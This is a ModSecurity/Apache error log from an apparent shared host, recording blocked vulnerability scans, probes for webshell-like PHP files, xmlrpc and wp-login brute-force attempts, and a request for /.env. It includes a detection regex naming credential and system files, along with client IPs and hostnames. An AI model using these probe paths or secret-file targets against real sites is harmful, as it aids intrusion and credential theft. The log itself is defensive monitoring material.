[Tue May 26 19:28:35.209168 2026] [security2:error] [pid 49598:tid 49769] [client 20.63.34.22:12184] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/wmore1.php"] [unique_id "ahWnC-zJzkdc0WtdrwtfBQAAAK4"]
[Tue May 26 19:28:35.209284 2026] [security2:error] [pid 49598:tid 49769] [client 20.63.34.22:12184] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/wmore1.php"] [unique_id "ahWnC-zJzkdc0WtdrwtfBQAAAK4"]
[Tue May 26 19:28:35.530503 2026] [security2:error] [pid 49598:tid 49806] [client 91.245.236.124:39155] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnC-zJzkdc0WtdrwtfFwAAANM"]
[Tue May 26 19:28:35.530661 2026] [security2:error] [pid 49598:tid 49806] [client 91.245.236.124:39155] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnC-zJzkdc0WtdrwtfFwAAANM"]
[Tue May 26 19:28:35.642744 2026] [security2:error] [pid 49598:tid 49752] [client 20.63.34.22:12162] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/wp-access.php"] [unique_id "ahWnC-zJzkdc0WtdrwtfGQAAAJ0"]
[Tue May 26 19:28:35.642852 2026] [security2:error] [pid 49598:tid 49752] [client 20.63.34.22:12162] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/wp-access.php"] [unique_id "ahWnC-zJzkdc0WtdrwtfGQAAAJ0"]
[Tue May 26 19:28:35.647095 2026] [security2:error] [pid 49598:tid 49764] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnC-zJzkdc0WtdrwtfDQAAAKk"]
[Tue May 26 19:28:35.953819 2026] [security2:error] [pid 49598:tid 49742] [client 20.63.34.22:12242] ModSecurity: Warning. Pattern match "/1\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1543"] [id "900921"] [msg "temporary TUW-72162 logging rule"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/1.php"] [unique_id "ahWnC-zJzkdc0WtdrwtfIAAAAJM"]
[Tue May 26 19:28:35.953937 2026] [security2:error] [pid 49598:tid 49742] [client 20.63.34.22:12242] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/1.php"] [unique_id "ahWnC-zJzkdc0WtdrwtfIAAAAJM"]
[Tue May 26 19:28:35.954047 2026] [security2:error] [pid 49598:tid 49742] [client 20.63.34.22:12242] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/1.php"] [unique_id "ahWnC-zJzkdc0WtdrwtfIAAAAJM"]
[Tue May 26 19:28:36.311777 2026] [security2:error] [pid 49598:tid 49851] [client 91.245.236.124:56123] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnDOzJzkdc0WtdrwtfKwAAAQA"]
[Tue May 26 19:28:36.311898 2026] [security2:error] [pid 49598:tid 49851] [client 91.245.236.124:56123] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnDOzJzkdc0WtdrwtfKwAAAQA"]
[Tue May 26 19:28:36.360217 2026] [security2:error] [pid 49598:tid 49796] [client 20.63.34.22:12166] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/sbhu.php"] [unique_id "ahWnDOzJzkdc0WtdrwtfMAAAAMk"]
[Tue May 26 19:28:36.360355 2026] [security2:error] [pid 49598:tid 49796] [client 20.63.34.22:12166] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/sbhu.php"] [unique_id "ahWnDOzJzkdc0WtdrwtfMAAAAMk"]
[Tue May 26 19:28:36.872981 2026] [security2:error] [pid 49598:tid 49824] [client 20.63.34.22:12164] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/bgymj.php"] [unique_id "ahWnDOzJzkdc0WtdrwtfOQAAAOU"]
[Tue May 26 19:28:36.873111 2026] [security2:error] [pid 49598:tid 49824] [client 20.63.34.22:12164] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/bgymj.php"] [unique_id "ahWnDOzJzkdc0WtdrwtfOQAAAOU"]
[Tue May 26 19:28:37.089701 2026] [security2:error] [pid 49598:tid 49846] [client 91.245.236.124:49959] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnDezJzkdc0WtdrwtfQwAAAPs"]
[Tue May 26 19:28:37.089849 2026] [security2:error] [pid 49598:tid 49846] [client 91.245.236.124:49959] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnDezJzkdc0WtdrwtfQwAAAPs"]
[Tue May 26 19:28:37.262139 2026] [security2:error] [pid 49598:tid 49781] [client 20.63.34.22:12279] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/file30.php"] [unique_id "ahWnDezJzkdc0WtdrwtfRwAAALo"]
[Tue May 26 19:28:37.262249 2026] [security2:error] [pid 49598:tid 49781] [client 20.63.34.22:12279] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/file30.php"] [unique_id "ahWnDezJzkdc0WtdrwtfRwAAALo"]
[Tue May 26 19:28:37.661860 2026] [security2:error] [pid 49598:tid 49838] [client 20.63.34.22:12243] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/yellow.php"] [unique_id "ahWnDezJzkdc0WtdrwtfUQAAAPM"]
[Tue May 26 19:28:37.662003 2026] [security2:error] [pid 49598:tid 49838] [client 20.63.34.22:12243] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/yellow.php"] [unique_id "ahWnDezJzkdc0WtdrwtfUQAAAPM"]
[Tue May 26 19:28:37.665008 2026] [security2:error] [pid 49598:tid 49736] [client 8.217.208.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahWnDezJzkdc0WtdrwtfUAAAAI0"]
[Tue May 26 19:28:37.879286 2026] [security2:error] [pid 49598:tid 49731] [client 91.245.236.124:33547] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnDezJzkdc0WtdrwtfVAAAAIg"]
[Tue May 26 19:28:37.879410 2026] [security2:error] [pid 49598:tid 49731] [client 91.245.236.124:33547] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnDezJzkdc0WtdrwtfVAAAAIg"]
[Tue May 26 19:28:38.352025 2026] [security2:error] [pid 49598:tid 49839] [client 20.63.34.22:12235] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/reze.php"] [unique_id "ahWnDuzJzkdc0WtdrwtfaAAAAPQ"]
[Tue May 26 19:28:38.352127 2026] [security2:error] [pid 49598:tid 49839] [client 20.63.34.22:12235] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/reze.php"] [unique_id "ahWnDuzJzkdc0WtdrwtfaAAAAPQ"]
[Tue May 26 19:28:38.430391 2026] [security2:error] [pid 49598:tid 49623] [remote 74.7.241.58:37768] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWnDuzJzkdc0WtdrwtfbQAA5hg"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-content/plugins/woocommerce/templates/cart
[Tue May 26 19:28:38.538649 2026] [security2:error] [pid 49598:tid 49633] [remote 172.104.164.56:58714] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 56.164.104.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWnDuzJzkdc0WtdrwtfZQAAkyI"]
[Tue May 26 19:28:38.627587 2026] [security2:error] [pid 49598:tid 49756] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnDuzJzkdc0WtdrwtfZAAAAKE"]
[Tue May 26 19:28:38.682185 2026] [security2:error] [pid 49598:tid 49777] [client 91.245.236.124:19115] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnDuzJzkdc0WtdrwtfdAAAALY"]
[Tue May 26 19:28:38.682283 2026] [security2:error] [pid 49598:tid 49777] [client 91.245.236.124:19115] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnDuzJzkdc0WtdrwtfdAAAALY"]
[Tue May 26 19:28:38.701440 2026] [security2:error] [pid 49598:tid 49849] [client 20.63.34.22:12264] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/wefile.php"] [unique_id "ahWnDuzJzkdc0WtdrwtfdQAAAP4"]
[Tue May 26 19:28:38.701526 2026] [security2:error] [pid 49598:tid 49849] [client 20.63.34.22:12264] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/wefile.php"] [unique_id "ahWnDuzJzkdc0WtdrwtfdQAAAP4"]
[Tue May 26 19:28:39.233173 2026] [security2:error] [pid 49598:tid 49838] [client 20.63.34.22:12261] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/xda.php"] [unique_id "ahWnD-zJzkdc0WtdrwtfhQAAAPM"]
[Tue May 26 19:28:39.233258 2026] [security2:error] [pid 49598:tid 49838] [client 20.63.34.22:12261] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/xda.php"] [unique_id "ahWnD-zJzkdc0WtdrwtfhQAAAPM"]
[Tue May 26 19:28:39.467492 2026] [security2:error] [pid 49598:tid 49787] [client 91.245.236.124:14143] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnD-zJzkdc0WtdrwtfiQAAAMA"]
[Tue May 26 19:28:39.467599 2026] [security2:error] [pid 49598:tid 49787] [client 91.245.236.124:14143] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnD-zJzkdc0WtdrwtfiQAAAMA"]
[Tue May 26 19:28:39.518870 2026] [security2:error] [pid 49598:tid 49735] [client 176.65.139.238:61230] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "veganfoodindia.moes-art.com"] [uri "/.env"] [unique_id "ahWnD-zJzkdc0WtdrwtfkAAAAIw"]
[Tue May 26 19:28:39.610609 2026] [security2:error] [pid 49598:tid 49809] [client 20.63.34.22:12216] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/revealability.php"] [unique_id "ahWnD-zJzkdc0WtdrwtflAAAANY"]
[Tue May 26 19:28:39.610746 2026] [security2:error] [pid 49598:tid 49809] [client 20.63.34.22:12216] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/revealability.php"] [unique_id "ahWnD-zJzkdc0WtdrwtflAAAANY"]
[Tue May 26 19:28:39.890577 2026] [security2:error] [pid 49598:tid 49658] [remote 119.18.52.246:36978] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.52.18.119.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWnD-zJzkdc0WtdrwtfmAAAvDs"]
[Tue May 26 19:28:39.932671 2026] [security2:error] [pid 49598:tid 49811] [client 20.63.34.22:12109] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/forbidals.php"] [unique_id "ahWnD-zJzkdc0WtdrwtfnQAAANg"]
[Tue May 26 19:28:39.932784 2026] [security2:error] [pid 49598:tid 49811] [client 20.63.34.22:12109] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/forbidals.php"] [unique_id "ahWnD-zJzkdc0WtdrwtfnQAAANg"]
[Tue May 26 19:28:40.250980 2026] [security2:error] [pid 49598:tid 49759] [client 91.245.236.124:26397] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnEOzJzkdc0WtdrwtfpAAAAKQ"]
[Tue May 26 19:28:40.251104 2026] [security2:error] [pid 49598:tid 49759] [client 91.245.236.124:26397] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnEOzJzkdc0WtdrwtfpAAAAKQ"]
[Tue May 26 19:28:40.286812 2026] [security2:error] [pid 49598:tid 49807] [client 20.63.34.22:12285] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/i.php"] [unique_id "ahWnEOzJzkdc0WtdrwtfqAAAANQ"]
[Tue May 26 19:28:40.286904 2026] [security2:error] [pid 49598:tid 49807] [client 20.63.34.22:12285] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/i.php"] [unique_id "ahWnEOzJzkdc0WtdrwtfqAAAANQ"]
[Tue May 26 19:28:40.321020 2026] [security2:error] [pid 49598:tid 49613] [remote 119.18.52.246:36978] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.52.18.119.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWnEOzJzkdc0WtdrwtfrAAAmQ4"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:28:40.567275 2026] [security2:error] [pid 49598:tid 49741] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnEOzJzkdc0WtdrwtfowAAAJI"]
[Tue May 26 19:28:40.589203 2026] [security2:error] [pid 49598:tid 49846] [client 20.63.34.22:12104] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/900.php"] [unique_id "ahWnEOzJzkdc0WtdrwtftgAAAPs"]
[Tue May 26 19:28:40.589319 2026] [security2:error] [pid 49598:tid 49846] [client 20.63.34.22:12104] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/900.php"] [unique_id "ahWnEOzJzkdc0WtdrwtftgAAAPs"]
[Tue May 26 19:28:41.036272 2026] [security2:error] [pid 49598:tid 49786] [client 91.245.236.124:39039] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnEezJzkdc0WtdrwtfwAAAAL8"]
[Tue May 26 19:28:41.036382 2026] [security2:error] [pid 49598:tid 49786] [client 91.245.236.124:39039] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnEezJzkdc0WtdrwtfwAAAAL8"]
[Tue May 26 19:28:41.164568 2026] [security2:error] [pid 49598:tid 49784] [client 20.63.34.22:12277] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/kj.php"] [unique_id "ahWnEezJzkdc0WtdrwtfwgAAAL0"]
[Tue May 26 19:28:41.164723 2026] [security2:error] [pid 49598:tid 49784] [client 20.63.34.22:12277] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/kj.php"] [unique_id "ahWnEezJzkdc0WtdrwtfwgAAAL0"]
[Tue May 26 19:28:41.434165 2026] [security2:error] [pid 49598:tid 49757] [client 20.63.34.22:12234] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/wuasr.php"] [unique_id "ahWnEezJzkdc0WtdrwtfzAAAAKI"]
[Tue May 26 19:28:41.434260 2026] [security2:error] [pid 49598:tid 49757] [client 20.63.34.22:12234] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/wuasr.php"] [unique_id "ahWnEezJzkdc0WtdrwtfzAAAAKI"]
[Tue May 26 19:28:41.815115 2026] [security2:error] [pid 49598:tid 49816] [client 91.245.236.124:58369] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnEezJzkdc0Wtdrwtf1gAAAN0"]
[Tue May 26 19:28:41.815246 2026] [security2:error] [pid 49598:tid 49816] [client 91.245.236.124:58369] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnEezJzkdc0Wtdrwtf1gAAAN0"]
[Tue May 26 19:28:41.870051 2026] [security2:error] [pid 49598:tid 49772] [client 20.63.34.22:12254] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/t.php"] [unique_id "ahWnEezJzkdc0Wtdrwtf1wAAALE"]
[Tue May 26 19:28:41.870140 2026] [security2:error] [pid 49598:tid 49772] [client 20.63.34.22:12254] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/t.php"] [unique_id "ahWnEezJzkdc0Wtdrwtf1wAAALE"]
[Tue May 26 19:28:42.121778 2026] [fcgid:warn] [pid 49598:tid 49840] (70014)End of file found: [client 66.132.195.51:42816] mod_fcgid: can't get data from http client
[Tue May 26 19:28:42.168466 2026] [security2:error] [pid 49598:tid 49760] [client 20.63.34.22:12245] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/class-t.api.php"] [unique_id "ahWnEuzJzkdc0Wtdrwtf4gAAAKU"]
